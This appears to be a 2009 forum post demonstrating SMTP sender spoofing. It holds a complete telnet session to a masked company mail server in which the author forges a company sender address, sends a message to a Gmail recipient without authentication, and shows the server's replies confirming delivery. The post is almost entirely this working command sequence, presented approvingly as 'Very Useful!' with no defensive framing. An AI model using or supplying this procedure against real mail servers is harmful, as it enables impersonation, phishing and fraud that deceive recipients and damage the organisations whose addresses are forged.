SMTP Spoofing

This is an old exploit I guess you would call it. It is not available in wide use but I was playing with it over the weekend and I figured I would post it.

C:\Users\Syrus>telnet mail.*******.com 2525

220 smtp.*******.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 21 Dec 2009 09:49:36 -0500
HELO
250 smtp.*******.com Hello [10.10.10.100]
MAIL FROM: user@*******.com
250 2.1.0 user@*******.com....Sender OK
RCPT TO: *******@gmail.com
250 2.1.5 *******@gmail.com
DATA
354 Start mail input; end with .
Here is my email message.

.
250 2.6.0 Queued mail for delivery

And Viola email sent from email address with no password or anything. Very Useful!